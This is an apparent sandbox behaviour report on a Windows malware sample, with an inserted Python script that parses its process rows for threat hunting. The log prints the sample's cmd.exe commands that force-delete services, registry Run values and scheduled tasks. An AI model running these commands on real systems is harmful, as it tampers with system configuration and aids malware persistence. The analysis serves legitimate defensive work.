    Source: a0RkmvhSaf.exe  Virustotal: Detection: 83%
    Source: a0RkmvhSaf.exe  ReversingLabs: Detection: 78%
    Source: unknown  Process created: C:\Users\user\Desktop\a0RkmvhSaf.exe "C:\Users\user\Desktop\a0RkmvhSaf.exe"
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Process created: C:\Users\user\AppData\Local\Temp\230053364.exe C:\Users\user\AppData\Local\Temp\230053364.exe
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Process created: C:\Windows\sysludpvs.exe C:\Windows\sysludpvs.exe
    Source: C:\Windows\sysludpvs.exe  Process created: C:\Users\user\AppData\Local\Temp\152942395.exe C:\Users\user\AppData\Local\Temp\152942395.exe
    Source: unknown  Process created: C:\Windows\sysludpvs.exe "C:\Windows\sysludpvs.exe"
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\634722489.exe C:\Users\user\AppData\Local\Temp\634722489.exe
    Source: C:\Users\user\AppData\Local\Temp\634722489.exe  Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" ""
    Source: C:\Windows\System32\conhost.exe  Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9208 -s 944
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\2052810334.exe C:\Users\user\AppData\Local\Temp\2052810334.exe
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "Windows Services"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\417928448.exe C:\Users\user\AppData\Local\Temp\417928448.exe
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\2047112978.exe C:\Users\user\AppData\Local\Temp\2047112978.exe
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpla" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinUpla"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\399630275.exe C:\Users\user\AppData\Local\Temp\399630275.exe
    Source: C:\Users\user\AppData\Local\Temp\399630275.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\2028814805.exe C:\Users\user\AppData\Local\Temp\2028814805.exe
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\393932919.exe C:\Users\user\AppData\Local\Temp\393932919.exe
    Source: C:\Users\user\AppData\Local\Temp\393932919.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinDrvUpd" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinDrvUpd"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\1216017805.exe C:\Users\user\AppData\Local\Temp\1216017805.exe
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\38822795.exe C:\Users\user\AppData\Local\Temp\38822795.exe
    Source: C:\Users\user\AppData\Local\Temp\38822795.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinUpdt"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\396820397.exe C:\Users\user\AppData\Local\Temp\396820397.exe
    Source: C:\Users\user\AppData\Local\Temp\396820397.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinMngr"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Process created: C:\Users\user\AppData\Local\Temp\230053364.exe C:\Users\user\AppData\Local\Temp\230053364.exe
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Process created: C:\Windows\sysludpvs.exe C:\Windows\sysludpvs.exe
    Source: C:\Windows\sysludpvs.exe  Process created: C:\Users\user\AppData\Local\Temp\152942395.exe C:\Users\user\AppData\Local\Temp\152942395.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\634722489.exe C:\Users\user\AppData\Local\Temp\634722489.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\2052810334.exe C:\Users\user\AppData\Local\Temp\2052810334.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\417928448.exe C:\Users\user\AppData\Local\Temp\417928448.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\2047112978.exe C:\Users\user\AppData\Local\Temp\2047112978.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\399630275.exe C:\Users\user\AppData\Local\Temp\399630275.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\2028814805.exe C:\Users\user\AppData\Local\Temp\2028814805.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\393932919.exe C:\Users\user\AppData\Local\Temp\393932919.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\1216017805.exe C:\Users\user\AppData\Local\Temp\1216017805.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\38822795.exe C:\Users\user\AppData\Local\Temp\38822795.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\396820397.exe C:\Users\user\AppData\Local\Temp\396820397.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: C:\Users\user\AppData\Local\Temp\634722489.exe  Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" ""
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "Windows Services"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpla" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinUpla"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Users\user\AppData\Local\Temp\399630275.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Users\user\AppData\Local\Temp\393932919.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinDrvUpd" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinDrvUpd"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Users\user\AppData\Local\Temp\38822795.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinUpdt"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Users\user\AppData\Local\Temp\396820397.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "WinMngr"
    Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
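The "Process created" rows above record a pattern worth pulling out of the flat list: each dropped Temp\*.exe launches cmd.exe to run `sc delete "<name>" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\<name>" /f`, or `reg delete ...\Run /v "<name>" /f` followed by `schtasks /delete /f /tn "<name>"`, tearing down service, Run-key and scheduled-task persistence under names this excerpt never shows the sample installing for itself. The Python below is an added triage script, not part of the Joe Sandbox report and not code from the sample: it parses rows written in the form shown above (a transcribed subset is embedded as constructed input), sketches the lineage from the rows' parent and child images (the rows carry no PIDs, so repeated launches of one binary collapse into a single node) and attributes each removal to the dropped binary that launched cmd.exe. The regexes and the rule that the sc and reg names must agree are the author's own heuristics.

```python
"""Triage helper for sandbox 'Process created' rows: rebuilds parent/child
edges and extracts persistence-removal chains (sc delete + reg delete of the
Services key, reg delete of a Run value + schtasks /delete).
Added example; not code from the Joe Sandbox report or from the sample."""
import re
from collections import defaultdict

# Constructed sample input: a subset of this report's rows, transcribed as
# "Source: <parent image>  Process created: <child image> <command line>".
SAMPLE_ROWS = r"""
Source: unknown  Process created: C:\Users\user\Desktop\a0RkmvhSaf.exe "C:\Users\user\Desktop\a0RkmvhSaf.exe"
Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Process created: C:\Users\user\AppData\Local\Temp\230053364.exe C:\Users\user\AppData\Local\Temp\230053364.exe
Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Process created: C:\Windows\sysludpvs.exe C:\Windows\sysludpvs.exe
Source: C:\Windows\sysludpvs.exe  Process created: C:\Users\user\AppData\Local\Temp\152942395.exe C:\Users\user\AppData\Local\Temp\152942395.exe
Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\2052810334.exe C:\Users\user\AppData\Local\Temp\2052810334.exe
Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc delete "Windows Services"
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\2028814805.exe C:\Users\user\AppData\Local\Temp\2028814805.exe
Source: C:\Users\user\AppData\Local\Temp\2028814805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
Source: C:\Users\user\AppData\Local\Temp\2028814805.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Service"
Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Process created: C:\Users\user\AppData\Local\Temp\396820397.exe C:\Users\user\AppData\Local\Temp\396820397.exe
Source: C:\Users\user\AppData\Local\Temp\396820397.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
"""

ROW_RE = re.compile(r"^Source: (?P<parent>.+?)\s+Process created: (?P<image>\S+)\s*(?P<cmdline>.*)$")

# Author's heuristics for the three removal shapes seen in the report.
SERVICE_WIPE_RE = re.compile(
    r'sc delete "(?P<svc>[^"]+)"\s*&\s*reg delete '
    r'"HKLM\\SYSTEM\\CurrentControlSet\\Services\\(?P<key>[^"]+)" /f', re.I)
RUNKEY_RE = re.compile(
    r'reg delete "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /v "(?P<name>[^"]+)" /f', re.I)
TASK_RE = re.compile(r'schtasks /delete /f /tn "(?P<name>[^"]+)"', re.I)


def parse_rows(text):
    """Return (parent image, child image, child command line) per row."""
    edges = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            edges.append((m["parent"], m["image"], m["cmdline"]))
    return edges


def classify_removal(cmdline):
    """(kind, name) for a command line that removes a persistence artefact,
    else None. A service wipe only counts when the sc and reg names agree."""
    m = SERVICE_WIPE_RE.search(cmdline)
    if m and m["svc"] == m["key"]:
        return ("service", m["svc"])
    m = RUNKEY_RE.search(cmdline)
    if m:
        return ("run_key", m["name"])
    m = TASK_RE.search(cmdline)
    if m:
        return ("scheduled_task", m["name"])
    return None


def removals_by_dropper(edges):
    """Map each process that launches cmd.exe for a removal to the set of
    (kind, name) artefacts it tears down."""
    out = defaultdict(set)
    for parent, image, cmdline in edges:
        if image.lower().endswith("\\cmd.exe"):
            hit = classify_removal(cmdline)
            if hit:
                out[parent].add(hit)
    return dict(out)


def build_children(edges):
    """Edges keyed by image path; without PIDs, repeated launches of one
    binary collapse into a single node, which is enough for a lineage sketch."""
    children = defaultdict(list)
    for parent, image, _ in edges:
        children[parent].append(image)
    return children


def lineage(children, root="unknown", depth=0, seen=None):
    """Depth-first indented lineage; a node already expanded is listed again
    but not descended into, so shared children such as cmd.exe cannot loop."""
    seen = seen if seen is not None else set()
    lines = []
    for child in children.get(root, []):
        lines.append("  " * depth + child)
        if child not in seen:
            seen.add(child)
            lines.extend(lineage(children, child, depth + 1, seen))
    return lines


if __name__ == "__main__":
    edges = parse_rows(SAMPLE_ROWS)
    print("\n".join(lineage(build_children(edges))))
    for dropper, hits in sorted(removals_by_dropper(edges).items()):
        print(dropper.rsplit("\\", 1)[-1], "->", sorted(hits))
```

Feed it the full row set from a report, or Sysmon event 1 ParentImage/Image/CommandLine fields rewritten into the same shape, and the output names each persistence artefact torn down and the dropped binary responsible. A cmd.exe line that pairs `sc delete` with a `reg delete` of the same Services key is a useful hunt query on its own, independent of this sample.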
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe  Section loaded: fwpuclnt.dll
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Section loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Section loaded: wininet.dll
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Section loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Section loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Section loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe  Section loaded: ntmarta.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: apphelp.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: urlmon.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: wininet.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: iertutil.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: srvcli.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: netutils.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: uxtheme.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: sspicli.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: windows.storage.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: wldp.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: kernel.appcore.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: profapi.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: winhttp.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: mswsock.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: iphlpapi.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: winnsi.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: napinsp.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: pnrpnsp.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: wshbth.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: nlaapi.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: dnsapi.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: winrnr.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: fwpuclnt.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: rasadhlp.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: firewallapi.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: fwbase.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: fwpolicyiomgr.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: cryptsp.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: rsaenh.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: wininet.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: winhttp.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: mswsock.dll
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe  Section loaded: winnsi.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: urlmon.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: wininet.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: iertutil.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: srvcli.dll
    Source: C:\Windows\sysludpvs.exe  Section loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\634722489.exe  Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: apphelp.dll
